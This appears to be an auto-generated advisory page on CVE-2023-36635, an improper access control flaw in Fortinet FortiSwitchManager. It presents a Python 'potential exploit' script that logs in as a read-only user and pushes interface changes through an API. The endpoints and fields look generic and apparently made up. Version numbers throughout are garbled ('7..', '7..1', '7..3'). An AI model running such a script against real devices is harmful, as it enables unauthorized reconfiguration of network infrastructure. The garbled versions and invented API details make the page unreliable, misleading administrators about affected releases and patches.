CVE-2023-36635 - Remote Control and Modification of Interface Settings in Fortinet FortiSwitchManager v7.2. to v7.2.2 and v7.. to v7..1

The Fortinet FortiSwitchManager is a powerful tool for managing all Fortinet FortiSwitch devices within your network. This comprehensive tool is designed for enterprise users and network administrators who want to simplify the processes of managing, monitoring, provisioning, and troubleshooting their FortiSwitch devices. However, a vulnerability has been discovered in some versions of FortiSwitchManager, which may allow a remote authenticated read-only user to modify the interface settings via the API.

Vulnerability Details

The vulnerability, identified as CVE-2023-36635, affects the following Fortinet FortiSwitchManager versions:

7.. through 7..1

The improper access control allows the remote authenticated read-only user to exploit the vulnerability by sending a specially crafted API request configured to change the configuration of the user interface. This could potentially give the attacker unauthorized control over the affected FortiSwitchManager device.

Here's a code snippet outlining a potential exploit using a Python script

import requests
import json

# Replace the following values with your actual target and credentials
TARGET_URL = "https://your-fortiswitch-manager-ip/api/v1";
USERNAME = "readonly-user"
PASSWORD = "your-password"

# Authenticate and get token
auth_data = {"username": USERNAME, "password": PASSWORD}
response = requests.post(f"{TARGET_URL}/auth", data=json.dumps(auth_data), headers={"Content-Type": "application/json"})
token = response.json()["token"]

# Craft the API request to modify the interface settings
interface_data = {
  "interface_name": "your-target-interface",
  "settings": {
    "new_setting_key": "new_setting_value"
  }
}

headers = {
  "Content-Type": "application/json",
  "Authorization": f"Bearer {token}"
}

# Send the request to modify the interface settings
response = requests.put(f"{TARGET_URL}/interfaces", data=json.dumps(interface_data), headers=headers)

if response.status_code == 200:
    print("Interface settings successfully modified.")
else:
    print("Failed to modify interface settings.")

Original References

- Fortinet Advisory: https://fortiguard.com/advisory/FG-IR-21-112
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2023-36635

Mitigation

Fortinet has released software updates that address this vulnerability. It is highly recommended for users of affected versions to upgrade their FortiSwitchManager software to the latest version.

For 7..x: Upgrade to 7..3 or later

Users should refer to the Fortinet Advisory (https://fortiguard.com/advisory/FG-IR-21-112) for detailed information on how to update their FortiSwitchManager to a protected version.

Conclusion

Fortinet's FortiSwitchManager is a widely used tool for managing and monitoring FortiSwitch devices in a network environment. The improper access control vulnerability, CVE-2023-36635, can be exploited by a remote authenticated read-only user, giving them unauthorized control over the affected device. Users of affected software versions are highly encouraged to update their FortiSwitchManager software to the latest available version that addresses this vulnerability.

Timeline

Published on: 09/07/2023 13:15:00 UTC
Last modified on: 09/12/2023 14:26:00 UTC